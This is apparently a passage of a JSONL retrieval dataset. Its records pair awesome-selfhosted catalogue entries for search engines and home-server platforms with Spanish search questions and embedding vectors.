awesome-selfhosted / Search Engines: MeiliSearch β€” Ultra relevant, instant and typo-tolerant full-text search API [MIT, Rust/Docker/deb]. Meme Search β€” AI-powered meme search engine. Automatically extracts descriptions from images using vision-language models, then indexes with vector embeddings for semantic and keyword search [Apache-2.0, Docker]. OpenSearch β€” Distributed and RESTful search engine [Apache-2.0, Java/Docker/K8S/deb]. SearXNG β€” Internet metasearch engine which aggregates results from various search services and databases (Fork of Searx) [⚠, AGPL-3.0, Python/Docker]. Sosse β€” Selenium based search engine and crawler with offline archiving [AGPL-3.0, Python/Docker]. Typesense β€” Blazing fast, typo-tolerant open source search engine optimized for developer happiness and ease of use [GPL-3.0, C++/Docker/K8S/deb]. Websurfx β€” Aggregate results from other search engines (metasearch engine) without ads while keeping privacy and security in mind. It is extremely fast and provides a high level of customization (alternative to SearX) [⚠, AGPL-3.0, Rust/Docker].", "indexar": "con que puedo montar un motor de bΓΊsqueda que intente entender lo que dicen las imΓ‘genes ademΓ‘s del texto?", "v": [-0.06341, 0.17292, -0.15751, -0.06636, -0.18575, -0.00987, -0.13252, 0.06526, -0.12275, -0.16253, 0.01041, 0.04737, 0.08449, -0.05044, 0.02336, 0.08654, 0.15597, -0.07554, 0.02729, -0.16729, -0.01087, -0.15257, -0.04281, -0.0954, -0.0049, -0.03098, -0.13035, 0.02557, -0.03318, -0.00768, -0.08375, 0.04443, 0.09959, 0.06876, -0.16605, -0.12545, 0.08843, 0.07599, 0.0581, 0.02345, -0.04586, 0.06311, -0.13597, 0.09909, -0.10534, -0.09138, -0.0197, -0.07529, 0.02434, -0.02968, 0.10484, 0.01438, -0.00823, 0.07121, -0.08336, -0.01368, 0.18893, 0.00433, 0.05973, -0.06413, 0.04085, 0.1212, -0.11175, 0.10178, -0.01947, 0.11501, 0.08853, 0.06979, -0.04803, -0.01631, -0.04242, 0.05957, 0.0679, -0.00514, -0.02157, 0.0521, -0.04596, -0.05574, -0.06682, 0.08949, -0.00073, 0.03245, -0.1227, 0.05676, -0.00478, -0.02464, 0.01589, -0.05034, 0.04592, -0.09069, -0.01954, 0.0668, 0.07803, 0.05296, -0.0624, -0.00857, 0.00519, 0.02378, -0.00036, 0.06665, 0.01436, -0.09077, -0.00171, 0.02348, 0.08911, -0.02516, 0.14486, -0.05934, 0.00407, -0.04596, 0.08288, -0.01648, -0.07966, -0.01106, -0.05189, -0.05276, -0.02531, 0.01838, -0.03688, -0.04539, -0.02426, 0.07378, 0.01038, 0.0588, 0.05164, -0.01132, 0.05997, 0.07823, -0.07162, -0.00993, 0.00634, 0.01861, -0.03197, -0.13021, -0.06172, 0.03645, 0.03318, 0.00113, -0.03958, -0.01072, -0.02969, -0.01799, -0.00248, -0.04392, -0.0553, 0.04433, 0.00074, -0.04927, 0.00613, -0.01245, -0.02345, 0.03624, 0.09826, 0.0085, 0.0546, 0.02131, 0.01283, -0.01495, 0.00402, -0.02056, -0.02996, 0.02897, -0.00658, 0.01018, 0.01686, -0.00541, -0.13676, -0.07629, -0.02526, -0.03184, -0.01003, -0.04212, -0.00891, -0.01157, 0.10315, 0.15573, -0.00528, -0.04445, -0.04312, 0.05201, -0.02887, 0.01732, -0.05614, 0.05751, 0.00418, 0.02255, 0.01711, 0.02822, -0.06637, -0.06402, -0.01551, -0.04952, -0.03104, 0.01565, 0.08039, -0.00294, -0.07254, 0.10705, 0.08914, -0.03249, -0.03536, -0.03774, 0.02179, 0.02019, -0.02803, -0.10057, -0.01072, 0.02533, -0.03696, 0.00047, 0.01759, 0.07888, -0.00629, -0.06351, -0.02965, 0.02457, -0.04121, 0.01757, -0.02451, 0.07242, 0.01672, 0.03935, 0.04276, 0.032, -0.00496, -0.00165, -0.0476, -0.00591, 0.01041, -0.01596, -0.01173, 0.04834, -0.05615, -1e-05, -0.01804, 0.00014, -0.01162, 0.02772, -0.01659, -0.02969, 0.03145, 0.02158, -0.00778, -0.01333, -0.02494, 0.01241, -0.01982, -0.00806, -0.00513, -0.02526, -0.00082, -0.03904, -0.04107, -0.04243, 0.04473, -0.04847]} +{"tipo": "pregunta", "herramienta": "Search Engines", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Search Engines", "tema": "search engines", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Search Engines: MeiliSearch β€” Ultra relevant, instant and typo-tolerant full-text search API [MIT, Rust/Docker/deb]. Meme Search β€” AI-powered meme search engine. Automatically extracts descriptions from images using vision-language models, then indexes with vector embeddings for semantic and keyword search [Apache-2.0, Docker]. OpenSearch β€” Distributed and RESTful search engine [Apache-2.0, Java/Docker/K8S/deb]. SearXNG β€” Internet metasearch engine which aggregates results from various search services and databases (Fork of Searx) [⚠, AGPL-3.0, Python/Docker]. Sosse β€” Selenium based search engine and crawler with offline archiving [AGPL-3.0, Python/Docker]. Typesense β€” Blazing fast, typo-tolerant open source search engine optimized for developer happiness and ease of use [GPL-3.0, C++/Docker/K8S/deb]. Websurfx β€” Aggregate results from other search engines (metasearch engine) without ads while keeping privacy and security in mind. It is extremely fast and provides a high level of customization (alternative to SearX) [⚠, AGPL-3.0, Rust/Docker].", "indexar": "cual es una alternativa libre a SearX que permita buscar sin anuncios y mantenga la privacidad?", "v": [0.01481, 0.11786, -0.13771, -0.05677, -0.03991, -0.13494, -0.02411, -0.14427, -0.18661, -0.13147, -0.03771, -0.13521, 0.05148, -0.05406, 0.10691, 0.0335, 0.05081, -0.00732, 0.17319, 0.08727, 0.02522, -0.0159, -0.08988, -0.1232, -0.0606, -0.10079, 0.10365, 0.00261, -0.09434, -0.07112, -0.01462, -0.05097, 0.05995, 0.04321, -0.00803, 0.06588, 0.0972, -0.00573, 0.06562, -0.09071, 0.13059, -0.03709, -0.06537, 0.09597, 0.01584, -0.00273, -0.08123, 0.07291, -0.04687, -0.0716, -0.08787, 0.00863, -0.03598, 0.04629, 0.12043, -0.00187, 0.20043, -0.02708, 0.04746, -0.04758, -0.07137, 0.06751, 0.13312, 0.09655, 0.0292, 0.03616, 0.04102, 0.02143, -0.04332, 0.09578, 0.11067, -0.09825, -0.03803, 0.05868, -0.03705, 0.04944, -0.0562, -0.00748, 0.0095, 0.00622, 0.01485, -0.06133, 0.01309, 0.06099, -0.04115, -0.01671, 0.09332, -0.06705, -0.0877, -0.05879, 0.14292, 0.1322, -0.07681, 0.12571, 0.02284, -0.04195, 0.0264, 0.08461, -0.07574, -0.00534, 0.11085, 0.06576, -0.1281, -0.00526, 0.02655, -0.03954, 0.01552, -0.05855, -0.03907, 0.00285, 0.02834, -0.02474, -0.01012, -0.03662, 0.00077, -0.01474, -0.10822, -0.0686, 0.03682, -0.0077, -0.06346, -0.03649, -0.03569, -0.03777, 0.00304, 0.01108, -0.0047, 0.04758, -0.02582, 0.07825, 0.07043, -0.06967, 0.01203, -0.04745, -0.01184, -0.00679, -0.06967, 0.03097, 0.03559, -0.03142, 0.08915, -0.05274, -0.00859, -0.05774, 0.04896, 0.01724, -0.00412, 0.03356, -0.00712, -0.04584, -0.07322, -0.04404, 0.05745, 0.1148, -0.01702, 0.06531, -0.05193, -0.09067, 0.03016, 0.06144, 0.01459, 0.00523, -0.04814, 0.02786, 0.0541, 0.0276, 0.03778, -0.01992, -0.05938, 0.00168, -0.03511, 0.03344, 0.03376, -0.15927, 0.09436, -0.07785, -0.03193, -0.06503, 0.04986, -0.0224, 0.05481, -0.01399, -0.0596, -0.03796, -0.00937, -0.05436, 0.01827, 0.0166, -0.01295, -0.00944, -0.09635, 0.02157, -0.07851, -0.03241, 0.02752, -0.0876, -0.01735, -0.03737, 0.01095, 0.03172, -0.02758, -0.00205, -0.06636, 0.00323, 0.01849, 0.00622, -0.05599, -0.03818, -0.02806, 0.01741, 0.05361, 0.00962, 0.02078, -0.05743, -0.07596, -0.03479, 0.07565, -0.05793, -0.02268, 0.05858, 0.00847, 0.00367, 0.07453, -0.06295, 0.01701, 0.03523, 0.06117, 0.0423, -0.02768, -0.00638, 0.01415, 0.02198, -0.01647, 0.02036, 0.09346, 0.05365, -0.04259, -0.03317, -0.00234, -0.06829, 0.04066, 0.04316, -0.04915, -0.00893, -0.00835, -0.0512, -0.07906, 0.02357, 0.03057, -0.06401, -0.02659, 0.06901, 0.01682, -0.03504, 0.06755, -0.02517]} +{"tipo": "pregunta", "herramienta": "Search Engines", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Search Engines", "tema": "search engines", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Search Engines: Yacy β€” Peer based, decentralized search engine server [GPL-2.0, Java/Docker/K8S]. ZincSearch β€” Search engine that requires minimal resources (alternative to Elasticsearch) [Apache-2.0, Go/Docker/K8S].", "indexar": "que programa sirve como motor de bΓΊsqueda descentralizado sin servidores centrales?", "v": [0.02423, -0.05803, -0.07325, -0.20667, -0.04913, -0.15394, 0.01661, -0.0906, -0.06392, -0.11179, -0.05936, -0.00032, 0.00313, -0.10428, 0.03947, 0.03667, 0.09291, -0.10115, 0.02261, 0.00062, 0.02124, -0.06543, 0.10352, -0.05508, -0.03265, 0.11988, -0.01947, -0.12099, -0.1174, -0.02201, 0.04903, -0.05303, 0.09128, 0.00571, 0.00461, -0.09743, -0.02774, 0.07828, -0.06945, 0.01821, 0.00283, 0.01568, -0.14636, -0.02978, 0.05809, -0.01696, 0.11561, -0.06032, 0.09355, -0.0981, -0.17626, -0.04807, -0.04444, -0.0142, 0.04479, -0.08018, -0.0819, 0.01672, -0.02887, -0.07672, -0.13704, 0.07547, 0.06398, -0.07578, 0.00503, -0.00966, 0.03057, -0.02382, -0.05714, -0.05158, -0.11376, 0.07798, 0.08495, -0.14559, -0.00649, 0.00794, -0.01986, -0.067, 0.05108, 0.03768, 0.0367, 0.07707, -0.00672, 0.08441, -0.0827, 0.03395, 0.11158, -0.05799, -0.05588, -0.01526, -0.01672, 0.09389, -0.00045, 0.17892, 0.0524, 0.00783, 0.10603, -0.0347, 0.0661, 0.06306, 0.18457, -0.08572, 0.04373, 0.05291, 0.02408, 0.03553, 0.20024, -0.06721, -0.00285, 0.00777, -0.01696, -0.01814, 0.00085, 0.00569, -0.04331, 0.04276, -0.04212, 0.03067, 0.01161, -0.03418, -0.07182, 0.02876, 0.0589, 0.00087, 0.03019, 0.00826, 0.07051, -0.00586, 0.03931, 0.05479, 0.04375, 0.03365, -0.05766, -0.00682, -0.04581, -0.10556, 0.04233, 0.01902, 0.04387, -0.02063, 0.02324, 0.0625, 0.00953, -0.01564, 0.05305, -0.00158, 0.18413, -0.02659, 0.02515, -0.02067, -0.07964, -0.07529, 0.02183, 0.03161, -0.08856, -0.04673, -0.01861, -0.05636, -0.07117, 0.04543, -0.01874, 0.05551, -0.07363, 0.02171, 0.03433, 0.04273, -0.01241, 0.00713, 0.08182, 0.0706, -0.01464, -0.00376, 0.03213, -0.07011, 0.08551, 0.07149, -0.02318, -0.06872, 0.09315, 0.0308, -0.09843, 0.08272, -0.05706, 0.03668, -0.04326, 0.02557, -0.06799, -0.0301, 0.03181, -0.03793, -0.00888, -0.07645, -0.07522, 0.06257, 0.08152, -0.03522, -0.08936, 0.07937, 0.01791, -0.07477, -0.05296, 0.00538, -0.02782, 0.00615, -0.02018, 0.06578, -0.07255, 0.01823, -0.00935, 0.08966, -0.04268, 0.01785, 0.08094, -0.04131, -0.03699, -0.07145, 0.00697, -0.00334, 0.01472, 0.03052, -0.01131, -0.01379, 0.02889, 0.06741, 0.01766, -0.02352, 0.0555, 0.01763, 0.05545, 0.0356, -0.03852, 0.02978, 0.00989, 0.00602, -0.02814, -0.00581, -0.01877, -0.00119, 0.0265, -0.08504, -0.01475, 0.06775, 0.00723, -0.03043, 0.01809, -0.03613, -0.00593, -0.03126, -0.00689, 0.04527, -0.03585, -0.02224, 0.00033, 0.0038, 0.05715, -0.02479]} +{"tipo": "pregunta", "herramienta": "Search Engines", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Search Engines", "tema": "search engines", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Search Engines: Yacy β€” Peer based, decentralized search engine server [GPL-2.0, Java/Docker/K8S]. ZincSearch β€” Search engine that requires minimal resources (alternative to Elasticsearch) [Apache-2.0, Go/Docker/K8S].", "indexar": "cual es una alternativa ligera a Elasticsearch para crear un buscador propio?", "v": [-0.04884, -0.02836, -0.15457, 0.00798, 0.05754, -0.05871, 0.00864, -0.04008, -0.14251, -0.09759, -0.0058, -0.09279, -0.03943, -0.04522, 0.1944, -0.09836, 0.09125, -0.06767, 0.0278, -0.04359, -0.08246, 0.02858, -0.12488, -0.11275, -0.05819, -0.15626, -0.04787, -0.0555, -0.01328, 0.11938, -0.09429, 0.14665, 0.07442, -0.00698, -0.07141, 0.09503, 0.145, -0.04715, 0.03832, 0.05028, 0.08214, 0.04619, 0.01686, 0.04299, -0.14023, -0.03492, 0.01417, 0.03369, -0.1032, 0.04908, -0.05894, 0.04986, -0.16651, 0.09017, 0.118, -0.06024, 0.15012, -0.19748, 0.03827, -0.07492, -0.11089, -0.07471, 0.02445, 0.01678, 0.00519, -0.00371, -0.03074, -0.04297, -0.0516, -0.08953, -0.00228, -0.02593, -0.03244, -0.04275, 0.02541, 0.14158, 0.08887, 0.00461, 0.11838, 0.02753, 0.06902, -0.05784, 0.04067, 0.01213, -0.1122, -0.07089, 0.05948, -0.05572, -0.00196, -0.00876, 0.03184, -0.0647, -0.04486, 0.10255, -0.06287, -0.06567, 0.08768, -0.04409, -0.08887, 0.02034, 0.01271, -0.08171, -0.06393, 0.04531, -0.00765, -0.05481, -0.01545, 0.03202, -0.10882, 0.03842, 0.05347, -0.04167, 0.00477, -0.00592, 0.05308, -0.00569, -0.05675, -0.05127, 0.04075, -0.10753, -0.0276, -0.0111, -0.03765, -0.04347, 0.00142, -0.03112, 0.05974, -0.00048, 0.06115, 0.01013, 0.13379, 0.02377, -0.09284, -0.10914, -0.0777, 0.00911, 0.00862, -0.01063, 0.06337, 0.05228, 0.03977, -0.00474, -0.00832, -0.08324, 0.05269, -0.05406, 0.043, -0.0256, 0.04018, 0.00223, -0.07497, -0.04839, 0.00823, 0.03069, -0.07549, -0.0012, -0.08518, 0.03415, -0.02938, 0.03881, 0.0337, 0.05781, -0.05812, -0.02525, 0.01575, -0.0194, -0.05445, -0.10814, -0.05824, 0.02501, -0.06181, -0.06299, -0.01722, -0.09515, 0.02996, -0.00033, -0.00031, -0.10861, 0.04199, -0.03061, 0.01704, 0.01837, -0.05079, 0.0205, -0.01289, -0.11813, 0.04837, 0.04289, -0.03002, -0.00127, 0.00076, -0.01211, -0.04725, -0.02722, -0.05386, -0.01599, 0.05307, -0.11993, 0.0257, -0.0338, -0.01446, 0.02529, -0.05881, -0.05736, -0.0182, -0.07755, 0.01005, 0.01988, 0.00703, 0.02564, 0.01105, -0.02278, 0.03711, 0.03357, -0.0454, -0.03364, -0.00022, -0.05609, 0.00589, -0.01124, 0.03383, 0.04313, 0.03075, 0.07713, -0.02528, 0.07907, 0.02867, -0.00976, -0.07408, -0.03282, -0.00806, -0.06171, -0.04758, 0.01362, -0.00128, 0.0158, 0.05019, 0.02796, 0.01986, -0.00809, 0.04268, -0.00552, -0.06534, 0.02706, -0.01109, 0.01521, -0.06056, 0.06673, -0.03957, -0.06212, -0.01636, 0.04457, 0.03304, -0.02978, 0.08003, -0.04269]} +{"tipo": "pregunta", "herramienta": "Search Engines", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Search Engines", "tema": "search engines", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Search Engines: Yacy β€” Peer based, decentralized search engine server [GPL-2.0, Java/Docker/K8S]. ZincSearch β€” Search engine that requires minimal resources (alternative to Elasticsearch) [Apache-2.0, Go/Docker/K8S].", "indexar": "como montaria un servidor de bΓΊsqueda basado en redes pares?", "v": [-0.06385, -0.10198, -0.14069, -0.18666, -0.18986, 0.00642, 0.03039, -0.13055, 0.03746, -0.14364, -0.03755, -0.01946, 0.03235, -0.07896, 0.08941, 0.0168, 0.06652, 0.10286, 0.19345, -0.05791, -0.05297, 0.0275, -0.01461, -0.0773, -0.07287, 0.0547, 0.02861, -0.06636, -0.06956, 0.05028, -0.09215, -0.0307, 0.01067, 0.04725, -0.09337, -0.10884, -0.00244, 0.10628, -0.01981, -0.0225, -0.02625, 0.02689, -0.03237, -0.05386, -0.05739, 0.04681, 0.03634, -0.11591, -0.02787, -0.04029, -0.0626, -0.03423, -0.1698, 0.00817, -0.08101, -0.11711, 0.20013, -0.04699, 0.0099, -0.083, -0.1183, -0.07025, 0.01512, -0.03116, 0.04608, -0.0366, 0.02411, 0.05376, -0.03936, -0.03182, -0.0149, 0.01276, -0.05873, -0.08107, 0.05783, 0.14573, 0.06599, -0.05485, 0.07228, 0.134, 0.04635, -0.00903, 0.01144, 0.09288, -0.10917, -0.05205, 0.08738, 0.00136, 0.05672, 0.0022, 0.05103, 0.0655, -0.08968, -0.01786, -0.00213, -0.02906, 0.03539, -0.10842, 0.0004, -0.02276, 0.01694, 0.06531, 0.05964, 0.05901, -0.0553, 0.08056, 0.10528, 0.00998, 0.02314, -0.10115, 0.08904, -0.0497, -0.07702, 0.00831, -0.07473, -0.09559, 0.02156, 0.06437, 0.05371, 0.03428, -0.0331, 0.02699, 0.01838, 0.04794, 0.0338, -0.00378, 0.05693, 0.04263, 0.04675, -0.03766, 0.06489, 0.02865, -0.05803, -0.02028, 0.00023, -0.00579, -0.02725, -0.05607, -0.05354, -0.11394, -0.0129, -0.03014, -0.05101, -0.04668, 0.08396, 0.09123, 0.11447, -0.17108, -0.07067, -0.01279, 0.02143, -0.00686, -0.05739, -0.05108, -0.11412, 0.04044, -0.10589, -0.06507, -0.06486, 0.01747, 0.10814, 0.01239, 0.00764, 0.02235, 0.02153, 0.03346, -0.06989, 0.03094, 0.02411, -0.00231, -0.10745, 0.05395, -0.08918, -0.03342, 0.00603, 0.0397, -0.05628, -0.03115, -0.01335, 0.0292, -0.02074, -0.06262, -0.0063, 0.04483, -0.01747, -0.08383, 0.05936, 0.02549, -0.07725, -0.02685, 0.03222, -0.02181, -0.05437, 0.0533, 0.07561, -0.08824, 0.03001, 0.03339, 0.04689, -0.02361, -0.01419, -0.04346, -0.02863, -0.059, -0.05484, -0.0515, -0.02276, -0.0284, 0.0193, 0.04092, -0.08174, -0.05782, 0.03892, -0.00537, -0.05841, -0.01288, 0.04413, -0.07723, 0.02061, 0.01695, -0.0324, 0.02921, 0.00259, 0.05647, 0.00233, 0.03672, -0.02196, -0.05826, -0.00811, -0.05898, 0.01346, -0.09203, -0.05367, -0.00773, -0.0083, -0.02807, -0.02216, 0.00812, -0.00538, -0.00972, -0.01293, -0.00887, -0.03038, 0.05693, 0.00257, -0.03965, -0.02732, 0.02615, -0.01385, -0.03091, -0.00468, -0.02102, 0.01273, -0.00686, 0.01339, -0.04082]} +{"tipo": "pregunta", "herramienta": "Self-hosting Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Self-hosting Solutions", "tema": "self-hosting solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Self-hosting Solutions: DietPi β€” Minimal Debian OS optimized for single-board computers, which allows you to easily install and manage several services for selfhosting at home [GPL-2.0, Shell]. DockSTARTer β€” DockSTARTer helps you get started with home server apps running in Docker [MIT, Shell]. Dropserver β€” An application platform for your personal web services [Apache-2.0, Go/Deno]. FreedomBox β€” Community project to develop, design and promote personal servers running free software for private, personal, communications [AGPL-3.0, Python/deb]. HomelabOS β€” Offline privacy-centric data-center. Deploy over 100 services with a few commands [MIT, Docker]. HomeServerHQ β€” All-in-one home server infrastructure and installer. Have a fully configured email server, VPN, and public website(s) set up in less than an hour, even behind CGNAT [GPL-3.0, Shell]. LibreServer β€” Home server configuration based on Debian [AGPL-3.0, Shell].", "indexar": "que sistema operativo minimalista me sirve para montar un servidor en una placa ΓΊnica?", "v": [0.07473, 0.04748, -0.30217, -0.18283, -0.18756, -0.1423, -0.03618, -0.09932, -0.09998, -0.0407, -0.02676, -0.1176, 0.19328, -0.03022, 0.10176, -0.03465, 0.0957, -0.16855, 0.04171, -0.04613, -0.12373, 0.00376, 0.03744, -0.06192, -0.0672, 0.06661, 0.06871, -0.16135, -0.16701, -0.03944, -0.02883, 0.04731, 0.04517, -0.08305, 0.01745, -0.08279, -0.02098, -0.00738, 0.0613, -0.00662, 0.04992, 0.0555, 0.05278, 0.05279, 0.04633, 0.0091, 0.13837, -0.03044, 0.03522, 0.04912, -0.07046, -0.04424, -0.15523, 0.01778, -0.01546, -0.10428, 0.06269, -0.09789, 0.09269, -0.0349, -0.07723, 0.0862, -0.04171, -0.04777, 0.10482, 0.05698, -0.02169, -0.03192, 0.07153, -0.02616, -0.07646, 0.02007, 0.0634, -0.04118, 0.04382, 0.09511, 0.03214, -0.01303, 0.09562, 0.04752, 0.12475, -0.00248, -0.10938, 0.08549, -0.00454, -0.04655, 0.01162, -0.05054, -0.02101, 0.06478, 0.05619, 0.04841, -0.04974, 0.05401, 0.03182, -0.06372, 0.07242, 0.04071, -0.0038, -0.02218, 0.0373, -0.01388, -0.06763, 0.05873, 0.00859, 0.00187, 0.10958, -0.03518, 0.04022, -0.06934, 0.01712, -0.03692, -0.07176, 0.03814, -0.0964, -0.07349, 0.02599, 0.011, -0.05407, 0.03391, -0.06557, 0.0695, 0.01441, 0.03811, 0.05437, -0.02757, 0.03669, 0.04406, 0.04609, -0.00276, 0.00989, -0.01867, -0.03194, -0.00078, -0.06548, 0.03527, 0.03877, -0.04278, -0.00313, 0.01792, 0.05899, 0.05954, -0.00462, -0.08254, 0.12233, 0.03912, 0.15486, -0.11845, -0.00039, 0.01336, 0.03942, 0.00572, -0.04699, -0.04314, -0.10171, -0.05284, 0.03249, -0.03406, -0.00553, -0.02364, 0.03385, 0.03209, 0.02419, 0.09075, -0.04231, -0.03824, -0.02264, 0.01643, 0.08263, 0.04026, 0.00313, 0.04407, 0.07384, -0.03414, 0.02205, 0.02941, -0.08623, -0.05267, 0.00814, 0.08634, -0.03833, 0.03521, 0.02864, 0.0483, -0.04049, 0.01859, -0.00144, 0.04419, 0.02958, -0.01568, 0.05809, 0.044, -0.03787, 0.01761, 0.01646, -0.03138, 0.00315, -0.0224, 0.00727, -0.0097, -0.01808, -0.01387, 0.01182, -0.09271, 0.0111, 0.02209, 0.02299, 0.0467, 0.02506, 0.0632, -0.04602, 0.0171, 0.04813, -0.05462, -0.04705, 0.04633, 0.02056, 0.01301, 0.01042, -0.03505, 0.02208, -0.01491, 0.01031, 0.05351, -0.01364, 0.01299, -0.04196, -0.02019, -7e-05, -0.06007, 0.00917, -0.0483, -0.01186, 0.02275, 0.01229, -0.03512, -0.02357, -0.00916, -0.03212, -0.06308, 0.02297, 0.05147, 0.02719, -0.06897, 0.0069, -0.07053, 0.01699, -0.02184, -0.07412, -0.05768, -0.01267, -0.01634, -0.0157, -0.0289, -0.01682, -0.00144]} +{"tipo": "pregunta", "herramienta": "Self-hosting Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Self-hosting Solutions", "tema": "self-hosting solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Self-hosting Solutions: DietPi β€” Minimal Debian OS optimized for single-board computers, which allows you to easily install and manage several services for selfhosting at home [GPL-2.0, Shell]. DockSTARTer β€” DockSTARTer helps you get started with home server apps running in Docker [MIT, Shell]. Dropserver β€” An application platform for your personal web services [Apache-2.0, Go/Deno]. FreedomBox β€” Community project to develop, design and promote personal servers running free software for private, personal, communications [AGPL-3.0, Python/deb]. HomelabOS β€” Offline privacy-centric data-center. Deploy over 100 services with a few commands [MIT, Docker]. HomeServerHQ β€” All-in-one home server infrastructure and installer. Have a fully configured email server, VPN, and public website(s) set up in less than an hour, even behind CGNAT [GPL-3.0, Shell]. LibreServer β€” Home server configuration based on Debian [AGPL-3.0, Shell].", "indexar": "con que programa puedo instalar y gestionar varios servicios para mi hogar fΓ‘cilmente?", "v": [-0.03871, 0.18495, -0.22101, -0.20014, 0.01956, -0.04216, -0.00169, 0.00398, -0.23412, -0.12588, -0.09496, -0.05517, 0.01205, -0.1037, 0.06804, 0.01562, 0.11125, -0.15972, 0.00077, 0.0961, -0.04544, 0.06723, -0.05143, -0.0006, -0.08433, -0.00126, 0.12327, -0.0811, -0.09512, -0.00271, 0.03621, -0.01545, 0.00411, -0.08836, -0.04057, -0.01928, 0.00613, 0.03474, 0.10867, -0.02201, 0.03312, -0.00545, 0.05614, 0.05, 0.1003, -0.0292, 0.10863, -0.13647, 0.00544, -0.06764, -0.0541, -0.08563, -0.05035, -0.00767, 0.01082, -0.08009, -0.01969, -0.14487, 0.00114, 0.02014, -0.04607, 0.07499, 0.04203, 0.15956, 0.08063, 0.02709, 0.03617, 0.01027, -0.09792, 0.00466, -0.07073, 0.03926, 0.02114, 0.01619, -0.06473, 0.04044, 0.01848, -0.08312, 0.07344, -0.02917, 0.03381, -0.01054, 0.00383, 0.0307, -0.05556, -0.10007, -0.07572, -0.05775, 0.04557, -0.09713, 0.00648, -0.0909, 0.00877, 0.01838, 0.0055, -0.02121, 0.15289, 0.07808, 0.00044, 0.00697, 0.02528, 0.01207, -0.04626, 0.17591, -0.06308, 0.00029, 0.06324, -0.0277, -0.07456, -0.04136, -0.08292, 0.04326, -0.01398, -0.0538, -0.05273, 0.02512, -0.0979, -0.04831, 0.03997, -0.01254, -0.11358, -0.02065, 0.08259, 0.08291, 0.10933, -0.09545, 0.07222, 0.05375, -0.03684, 0.09708, -0.00893, -0.06532, 0.0257, -0.02052, -0.04856, -0.02054, -0.02597, -0.08302, -0.02925, -0.06504, 0.0063, 0.08193, 0.0399, -0.00288, 0.08927, -0.03265, -0.04318, -0.03818, 0.02091, 0.05667, 0.02527, 0.01681, -0.00988, 0.07196, -0.03901, -0.03027, 0.07356, -0.03706, -0.02982, 0.00279, -0.06313, 0.00562, 0.02626, -0.03271, 0.00346, 0.05431, 0.02244, 0.04845, 0.06393, 0.09237, -0.09867, 0.12287, 0.00433, -0.04603, 0.02272, -0.02372, 0.04392, -0.10017, 0.03092, -0.00458, -0.07384, 0.06666, 0.02768, 0.00728, -0.0412, 0.01487, -0.07778, 0.07963, -0.05955, -0.03819, -0.04052, -0.00195, -0.05878, -0.00301, 0.01392, -0.0457, -0.05516, -0.04664, -0.03996, -0.02116, -0.08771, 0.04491, 0.04202, -0.00117, 0.04603, 0.04855, 0.02012, 0.04676, 0.04743, 0.07562, 0.0247, -0.00135, 0.05578, -0.00291, -0.00868, 0.02344, -0.01527, -0.01055, 0.08302, 0.06151, 0.00064, -0.00528, 0.00873, 0.01287, -0.00498, -0.07922, 0.04332, -0.01163, 0.0052, 0.05119, -0.04015, -0.05251, 0.02087, -0.01931, 0.05187, -0.05042, 0.03026, -0.06571, -0.0129, -0.01511, 0.02703, 0.07466, 0.01022, -0.01974, -0.05588, -0.0015, -0.03415, 0.04768, 0.00082, -0.03005, -0.03263, 0.04531, 0.02496, -0.04453, -0.00174, 0.0292]} +{"tipo": "pregunta", "herramienta": "Self-hosting Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Self-hosting Solutions", "tema": "self-hosting solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Self-hosting Solutions: DietPi β€” Minimal Debian OS optimized for single-board computers, which allows you to easily install and manage several services for selfhosting at home [GPL-2.0, Shell]. DockSTARTer β€” DockSTARTer helps you get started with home server apps running in Docker [MIT, Shell]. Dropserver β€” An application platform for your personal web services [Apache-2.0, Go/Deno]. FreedomBox β€” Community project to develop, design and promote personal servers running free software for private, personal, communications [AGPL-3.0, Python/deb]. HomelabOS β€” Offline privacy-centric data-center. Deploy over 100 services with a few commands [MIT, Docker]. HomeServerHQ β€” All-in-one home server infrastructure and installer. Have a fully configured email server, VPN, and public website(s) set up in less than an hour, even behind CGNAT [GPL-3.0, Shell]. LibreServer β€” Home server configuration based on Debian [AGPL-3.0, Shell].", "indexar": "cual es una alternativa libre para tener mis propios servidores de comunicaciΓ³n privada?", "v": [-0.11645, 0.05604, -0.0267, -0.15028, -0.11311, -0.11728, 0.06228, -0.04844, -0.16625, -0.06376, -0.0391, -0.04151, 0.0708, -0.03732, 0.08755, -0.02624, 0.20475, -0.06272, 0.20264, 0.03702, -0.03559, 0.05386, 0.01033, -0.0756, -0.09077, -0.0451, 0.04618, -0.11911, -0.04075, 0.05786, 0.02605, -0.01049, 0.07532, 0.03776, -0.01129, 0.11727, 0.03512, 0.19311, 0.0171, 0.02011, 0.08077, -0.07958, -0.05348, 0.11621, 0.07732, -0.03903, -0.13046, -0.0249, 0.02442, 0.06516, -0.20091, -0.03941, -0.04512, 0.02724, -0.00197, -0.04751, 0.1089, -0.06903, -0.04587, 0.00687, -0.10539, 0.04745, 0.03848, 0.0026, 0.08835, -0.0324, -0.03894, -0.08792, -0.15354, 0.0316, 0.06838, -0.0302, -0.02361, -0.05074, -0.01403, 0.08108, -0.14054, 0.04374, 0.0059, 0.09269, 0.0463, -0.06537, -0.01455, 0.0919, -0.10337, -0.07562, 0.0355, -0.03023, -0.00089, 0.09118, 0.07689, 0.02808, -0.08971, 0.07009, -0.05348, -0.02752, 0.02678, -0.04049, -0.0451, 0.01986, 0.08837, 0.08683, -0.07304, -0.07732, -0.03534, 